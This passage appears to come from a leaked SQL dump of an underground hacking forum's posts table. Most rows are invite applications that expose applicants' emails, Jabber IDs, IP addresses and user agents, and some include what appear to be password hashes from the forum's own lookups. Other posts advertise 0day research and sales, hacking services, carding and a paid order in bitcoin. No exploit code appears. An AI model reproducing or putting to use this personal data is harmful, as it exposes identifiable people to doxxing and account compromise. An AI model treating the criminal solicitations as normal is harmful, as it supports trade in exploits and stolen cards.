from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 79.134.235.132\n[*][b]real ip[/b]: 79.134.235.132\n[*][b]User agent[/b]: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1661, 1425, 1659, 'null', 9, '', 1408353158, '[QUOTE=lumbricus;1659]Where are all the web app dudes? Is this palce full of script kiddies?[/QUOTE]\r\n\r\n:D lol', 1, 0, '', 0, 1, 0, 0, 0), (1662, 1425, 1574, 'lumbricus', 39, '', 1408353694, 'I appreciate your attention null, however I do not find my previous comment very funny...\n\nI wish I could share your comedy...\n\nIt is quite frustrating that I can\'t even find any like-minded testers :(\n\nEverybody I meet is just a scanner monkey who loves to play with havij or SQLmap', 1, 0, '', 0, 1, 0, 0, 0), (1663, 1425, 1662, 'null', 9, '', 1408355020, '[QUOTE=lumbricus;1662]\r\nEverybody I meet is just a scanner monkey who loves to play with havij or SQLmap[/QUOTE]\r\n\r\nThis is just a test automation.', 1, 0, '', 0, 1, 0, 0, 0), (1664, 1425, 1574, 'lumbricus', 39, '', 1408355318, 'Yes, I understand what it is. I am also highly experienced. I only require help with extremely difficult problems.', 1, 0, '', 0, 1, 0, 0, 0), (1665, 1489, 0, 'Invite', 2, '{$name}', 1408355346, '[SIZE=\'4\'][COLOR=\'Sienna\']xotopix[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: xotopix@yahoo.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 105.157.20.236\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/hashtag/fotopix | https://twitter.com/hashtag/fotopix \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1666, 1425, 1664, 'null', 9, '', 1408355468, '[QUOTE=lumbricus;1664]Yes, I understand what it is. I am also highly experienced. I only require help with extremely difficult problems.[/QUOTE]\r\n\r\nOne head good- a forum better!\r\n\r\nÃÂðôõюÑÂÑŒ ÿрðòøûьýþ ýðÿøÑÂðû ÑÂту хрõýь-\r\nÞôýð óþûþòð хþрþшþ- цõûыù фþруü ûучшõ!', 1, 0, '', 0, 1, 0, 0, 0), (1667, 1425, 1664, 'ropertus', 33, '', 1408355572, '[QUOTE=lumbricus;1664]Yes, I understand what it is. I am also highly experienced. I only require help with extremely difficult problems.[/QUOTE]\r\n\r\nWhat would you deem an extremely difficult problem? Can you give us an example so we get an idea of the scale of the problems at hand?', 1, 1, '', 0, 1, 0, 0, 0), (1668, 1425, 1574, 'lumbricus', 39, '', 1408355944, 'Sure, \r\n\r\nThere are too many examples to list all, so I will keep the list controlled. \r\n\r\nUnorthodox database ex-filtration techniques, mainly due to custom code (Scanners will not work) \r\n\r\nI do not hate scanners, however they are noisy and most of the time do not work on custom deployments. \r\n\r\nAlso, many research issues, IBM Websphere Commerce 0day but facing issues with merchant key etc \r\n\r\nPlease forgive my unwillingness to share my details in this public forum, I really enjoy this forum but work should be spoken of during OTR communications.', 1, 0, '', 0, 1, 0, 0, 0), (1670, 1490, 0, 'lumbricus', 39, 'Order - 2 BTC', 1408360114, 'Contact for order - OTR/PGP', 1, 0, '', 0, 1, 0, 0, 0), (1688, 1506, 0, 'Invite', 2, '{$name}', 1408452980, '[SIZE=\'4\'][COLOR=\'Sienna\']cr33k[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: cr33k@jabb3r.de\n[b]e-mail[/b]: munsters2kx@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 50.53.172.56\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://www.threadless.com/profile/1524260/cr33k | https://www.threadless.com/profile/1524260/cr33k \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1671, 1491, 0, 'Invite', 2, '{$name}', 1408366164, '[SIZE=\'4\'][COLOR=\'Sienna\']Flu[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: flu8127s@jabber.ru\n[b]e-mail[/b]: none, contact me on jabber.\n[b]Info[/b]: I\'m Flu,\r\n\r\nI\'m a coder/hacker etc for ~10 years. I have discovered 0days in many major PHP apps such as KAYAKO, PLESK and many bugs in major websites.More recently however I have moved on to finding memory exploits in software such as media players (VLC, Quicktime) and web browsers.\r\n\r\nI was previously a member of the underground forum Darkode (under a different name) where I offered hacking services/0days. I will be looking to help with the research of new 0days and possibly become a buyer of some too.\r\n\r\n\r\nThanks,\r\nFlu.\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 77.95.224.187\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://flu.oregon.gov | flu.oregon.gov \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1672, 1492, 0, 'Invite', 2, '{$name}', 1408366415, '[SIZE=\'4\'][COLOR=\'Sienna\']fifteen[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: blogging4naija@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 154.120.98.13\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://fifteen.nl | fifteen.nl \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1675, 1490, 1670, 'lumbricus', 39, '', 1408372164, 'CODE 200 < Working Fine~', 1, 0, '', 0, 1, 0, 0, 0), (1676, 1494, 0, 'Invite', 2, '{$name}', 1408376286, '[SIZE=\'4\'][COLOR=\'Sienna\']marconi[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: racetrack@exploit.im\n[b]e-mail[/b]: cleartext@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 117.111.17.225\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : marconi : reirprew@gmail.com : : 67c439ba607a22f570719199fa72f3a2\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.youtube.com/user/smoothflamenco | http://www.youtube.com/user/smoothflamenco \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1677, 1495, 0, 'Invite', 2, '{$name}', 1408377475, '[SIZE=\'4\'][COLOR=\'Sienna\']jerzyboy[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: moneyflow@jabber.ch\n[b]e-mail[/b]: bermudaonads@outlook.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 95.130.9.129\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/hashtag/jerzyboy | https://twitter.com/hashtag/jerzyboy \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1678, 1496, 0, 'Invite', 2, '{$name}', 1408379384, '[SIZE=\'4\'][COLOR=\'Sienna\']Camelot[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ---\n[b]e-mail[/b]: gabyruss_sv_45@yahoo.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 92.84.233.116\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://camelot.userlan.ru | camelot.userlan.ru \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1679, 1497, 0, 'Invite', 2, '{$name}', 1408383062, '[SIZE=\'4\'][COLOR=\'Sienna\']still-rise[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: still-rise@khovansky.net\n[b]e-mail[/b]: v.still-rise@yandex.ru\n[b]Info[/b]: php/python coder,hacker,carder\r\nprofiles:\r\nhttps://monopoly.ms/user/468-still-rise/\r\nhttps://korovka.so:6699/member.php?u=1988\r\nhttp://psh-world.ru/member.php?u=11\r\nhttps://exploit.in/forum/index.php?showuser=52493\r\nhttp://vpro.su/member.php?u=90210\r\nhttps://pp24.to/member.php?u=1008\r\nhttps://armada.la/index.php?/user/422-still-rise/\r\ndarkode login:still-rise\r\n\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.165.252.227\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/price_msiza | https://twitter.com/price_msiza \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1680, 1498, 0, 'Invite', 2, '{$name}', 1408401529, '[SIZE=\'4\'][COLOR=\'Sienna\']cosmos9[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: cosmos_9@hotmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 190.41.180.230\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://cosmos9.tistory.com | cosmos9.tistory.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1681, 1499, 0, 'Invite', 2, '{$name}', 1408404200, '[SIZE=\'4\'][COLOR=\'Sienna\']jerzyboyz[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: moneyflow@jabber.se\n[b]e-mail[/b]: bermudaonads@outlook.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 95.211.197.1\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://ballardfarmersmarket.wordpress.com/.../sunday-september-1st-taste-that-hard-cider-before-you-buy-it-jerzy-boyz-returns-and-its-st-... | http://ballardfarmersmarket.wordpress.com/.../sunday-september-1st-taste-that-hard-cider-before-you-buy-it-jerzy-boyz-returns-and-its-st-... \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1682, 1500, 0, 'Invite', 2, '{$name}', 1408404295, '[SIZE=\'4\'][COLOR=\'Sienna\']snta[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: d12_pirate_2pac@homail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 105.107.176.67\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://snta.com | snta.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1683, 1501, 0, 'Invite', 2, '{$name}', 1408411226, '[SIZE=\'4\'][COLOR=\'Sienna\']n00b[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: n00b@exploit.im\n[b]e-mail[/b]: lonelysoul505@yahoo.com\n[b]Info[/b]: Skills:\r\n\r\nWebapp penetration testing\r\nCan code in PHP and Mysql\r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 115.242.175.144\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : n00b : angellover@list.ru : 91.76.99.147 : 6f6a6bc26b83f9aad4fab10a3d02b665\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://steve-yegge.blogspot.com/2008/.../portrait-of-n00b.html | http://steve-yegge.blogspot.com/2008/.../portrait-of-n00b.html \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1684, 1502, 0, 'Invite', 2, '{$name}', 1408436858, '[SIZE=\'4\'][COLOR=\'Sienna\']g0rx[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: g0r@jabber.dk\n[b]e-mail[/b]: g0rx@bk.ru\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 109.56.65.25\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://extratorrent.cc/profile/g0rx/ | http://extratorrent.cc/profile/g0rx/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1685, 1503, 0, 'Invite', 2, '{$name}', 1408439952, '[SIZE=\'4\'][COLOR=\'Sienna\']rDNix[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: mynamemishal@gmail.com\n[b]e-mail[/b]: mynamemishal@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 188.70.42.41\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D167 Safari/9537.53\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://vk.com/video6031276_164007162 | http://vk.com/video6031276_164007162 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1686, 1504, 0, 'Invite', 2, '{$name}', 1408450388, '[SIZE=\'4\'][COLOR=\'Sienna\']Nickname[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: Email@as.qwe\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 5.228.94.73\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0), (1687, 1505, 0, 'Invite', 2, '{$name}', 1408450537, 